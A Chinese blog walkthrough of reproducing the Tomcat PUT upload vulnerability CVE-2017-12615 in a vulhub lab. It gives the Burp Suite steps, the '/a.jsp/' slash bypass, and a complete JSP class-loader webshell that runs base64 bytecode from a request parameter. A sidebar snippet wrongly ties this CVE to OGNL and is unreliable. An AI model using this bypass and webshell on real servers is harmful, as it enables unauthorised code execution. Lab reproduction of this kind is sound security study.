Tomcat文件上传漏洞复现 CVE-2017-12615

最新推荐文章于 2024-09-10 10:21:38 发布
最新推荐文章于 2024-09-10 10:21:38 发布
阅读量516 收藏 7
点赞数 3
分类专栏: 漏洞复现 文章标签: tomcat java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62284238/article/details/142031627
版权

1.准备:

1.1复现环境

漏洞环境:vulnhub靶场

工具准备:burpsuite

1.2环境启动

进入vulnhub目录下的tomcat目录,进入CVE-2017-12615目录

cd /home/hbesljx/vulhub/tomcat/CVE-2017-12615

docker-compoe启动漏洞环境

docker-compose up -d

访问靶机的8080端口。出现tomcat界面即为开启成功!

2.概念说明

2.1 tomcat是什么

 Apache Tomcat是由Apache Software Foundation(ASF)开发的一个开源Java WEB应用服务器。

2.2 tomcat的web.xml文件是什么

web.xml是位于tomcat的webapps下的一个文件,指定了该网站的一些配置。

2.3 readonly是什么

readonly是tomcat的一项配置属性,当设置为true时,为只读,当设置为false时,允许任意用户通过PUT方法上传文件。

2.4 PUT方法是什么

put方法是http请求方法的一种,将会在目标服务器创建一项新的资源或者覆盖原有的资源。

3.漏洞原理

3.1 

tomcat错误设置了readonly为false,使得我们可以通过PUT方法上传任意文件到目标服务器

3.2

tomcat的servlet在web.xml中配置,通过查看web.xml可知,后缀为jsp和jspx的文件由JspServlet解析,而其它文件由DefaultServlet解析。我们要上传一个jsp文件木马,由于JspServlet中没有原定接收我们这个jsp文件的servlet,因此我们上传这个木马后,目标服务器不会有任何反应,因为无法接收我们的jsp文件。但是我们通过一些绕过手段,使得我们的jsp木马被DefaultServlet接收,这样就可以被目标服务器成功接收。

4.漏洞复现

4.1 访问一个不存在的a.jsp文件,并且使用burpsuite抓包

4.2 修改数据包的方法为PUT,并且将a.jsp的内容写在最下面

4.3 修改/a.jsp为/a.jsp/并放行数据包

a.jsp/文件会进入tomcat的DefaultServlet中,而windows创建文件a.jsp/时,会自动将后面的反斜杠/删除,因为windows文件命名不允许出现/

4.4访问靶机ip:8080/a.jsp

说明我们成功写入了a.jsp文件

5.获取webshell

5.1上传木马

JSP木马如下:

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

5.2使用蚁剑连接jsp木马

连接成功!

唔熙迪熙
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-12615-master.zip
09-04
在`CVE-2017-12615-master.zip`文件中,可能包含了用于演示漏洞利用的工具和脚本。这些工具通常会模拟一个恶意的HTTP请求,其中包含能够触发远程代码执行的OGNL表达式。攻击者可以使用这些工具测试他们的目标系统...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-...CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
在springboot中如何使用Jetty替换Tomcat
tyxjolin的专栏
09-08 392
BIO是传统的同步阻塞IO,即客户端发起请求,服务器必须开一个线程接收请求,并开启一个线程进行处理,直到处理完毕后再通过一个线程返回结果。在高并发的情况下,服务器线程开销巨大,容易导致线程堆积和资源浪费。
JavaWeb【day09】--(Mybatis)
m0_62388400的博客
09-08 1284
预编译SQL有两个优势:性能更高更安全(防止SQL注入)性能更高:预编译SQL,编译一次之后会将编译后的SQL语句缓存起来,后面再次执行这条语句时,不会再次编译。(只是输入的参数不同)更安全(防止SQL注入):将敏感字进行转义,保障SQL的安全性。在页面原型中,列表上方的条件是动态的,是可以不传递的,也可以只传递其中的1个或者2个或者全部。而在我们刚才编写的SQL语句中,我们会看到,我们将三个条件直接写死了。
(汇总)Mybatis超全三万字详解
yjp1240201821的博客
09-07 1280
MyBatis汇总,超全三万字详解,从各方面帮助深刻理解MyBatis
spring事务详细讲解-深入浅出
小电玩
09-08 433
Spring 事务是本身就是对数据库的事务的支持,没有数据库的事务 Spring 是本身无法实现事务的。Spring只提供了统一事务管理接口,具体的实现还是由各数据库自己实现。在使用 Spring 事务时,可以通过注解或编程方式将需要进行事务管理的方法和代码块标记为事务性操作,当这些操作被执行时,Spring 会负责开启时根据当前环境中设置的隔离级别,调整数据库隔离级别。
Java多线程:深入探索与详细解析
m0_63550220的博客
09-08 1431
作为Java中的基本执行单元,线程是轻量级的进程,由线程ID、程序计数器、Java虚拟机栈、本地方法栈、和线程私有内存等部分组成。每个线程都有独立的执行路径,但共享进程的资源(如内存)。:进程是系统资源分配的基本单位,它包含了一个或多个线程以及这些线程运行所需的资源。在Java中,JVM(Java虚拟机)就是一个进程,而运行在JVM上的多个线程则共享JVM的内存空间。:并发指的是多个任务在同一时间段内交替执行,而并行则指的是多个任务在同一时刻真正同时执行。
JAVA基础:数据类型、命名规范
weixin_53755148的博客
09-05 1361
变量类型就是用来指定变量中存储数据的类型。也称为数据类型。
Java集合:Stack详解
最新发布
yang_brother的博客
09-10 460
Java 中的Stack类是一个后进先出(LIFO, Last In First Out)的数据结构,它继承自Vector类。尽管Stack是一个可用的类,但它被认为是遗留的,并且在新代码中不推荐使用。通常建议使用Deque或ArrayDeque作为替代。
自定义Stater
m0_63624484的博客
09-07 696
我们平时在导入依赖的时候,大部分导入的都是xxx-spring-boot-stater。那是因为它们都基于spring的规则将写好的框架定义成一个stater,这样方便springboot引用它们写好的功能。那我们为什么也要自定义stater呢?
币安/OK现货合约量化系统APP开发
I592O929783的博客
09-08 503
后端:考虑系统需要处理大量实时数据和高频交易的特点,选择高性能的编程语言和技术框架,如Python的Django或Flask框架,Java的Spring Boot等。用户交互界面:设计直观易用的用户交互界面,包括交易界面、策略配置界面、风险管理界面等,方便用户进行交易操作、策略配置和风险管理。市场数据接入:开发市场数据接入模块,从币安等交易所或数据服务商获取实时的市场数据,包括行情数据、订单簿数据、成交数据等。前端:选择适合开发复杂界面的前端框架,如React、Vue.js等,以提供用户友好的交互界面。
基于JavaWeb开发的JavaSpringboot+Vue实现前后端分离房屋租赁系统
央顺科技官方博客
09-05 560
2021年处于信息科技高速发展的大背景之下。在今天,缺少手机和电脑几乎已经成为不可能的事情,人们生活中已经难以离开手机和电脑。针对增加的成本管理和操作,各大商家非常有必要建立自己的网上房屋租赁平台系统,这既可以让更多的人体验到网络所带来的方便,也有助于提高房屋的租赁。在经过几十年的高速发展后,互联网已成为最流行、最普及的媒体,每天的信息流量甚至能比得上过去十年。其以便捷的信息交换、快速的沟通速度,悄然地改变着会员的消费方式。
MyBatis面试
Tony_yitao的博客
09-09 564
MyBatis面试
springboot数据库连接由localhost改成IP以后访问报错500(2024/9/7
不起眼小菜菜的博客
09-07 311
步骤很详细,直接上教程……
SpringBoot总结
2302_77073236的博客
09-06 269
都做成图了,方便理解和掌握全局关系。
基于SpringBoot的多媒体信息共享平台开发
qq_45800365的博客
09-06 249
基于SpringBoot的多媒体信息共享平台开发,java项目。eclipse和idea都能打开运行。推荐环境配置:eclipse/idea jdk1.8 maven mysql前端技术:vue,Ajax,Json后端技术:SpringBoot,MyBatis本系统共分为两个角色:管理员和用户。主要功能有:后台:系统首页个人中心用户管理作品分类管理作品信息管理私聊信息管理系统管理前台:首页作品信息公告信息后台管理个人中心。
Apache Tomcat文件包含漏洞(CVE-2020-1938)
09-11
嗨!对于Apache Tomcat文件包含漏洞(CVE-2020-1938),该漏洞是在2020年2月份公开的,影响Tomcat 9.0.0.M1至9.0.30以及8.5.0至8.5.50版本。该漏洞允许攻击者通过发送特制的请求来执行任意文件的读取和包含。 该漏洞的根本原因在于Tomcat的处理器组件(Servlet、WebSocket等)对于路径参数错误地解析了请求。攻击者可以利用这一点来读取或包含Web应用程序中的敏感文件,甚至可能在服务器上执行恶意代码。 由于该漏洞的危害性较高,建议及时升级到Tomcat 9.0.31或8.5.51版本,这些版本修复了该漏洞。此外,如果无法立即升级,你可以考虑使用防火墙或其他网络安全设备来限制对Tomcat端口的访问,从而减轻潜在攻击的风险。 记住,定期更新和维护所有软件和库是保持系统安全的重要措施之一。同时,合理配置服务器和应用程序,限制访问权限,并进行网络安全审计也是必要的。如果你是Tomcat用户,请务必关注并采取适当的措施来保护你的系统免受该漏洞的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值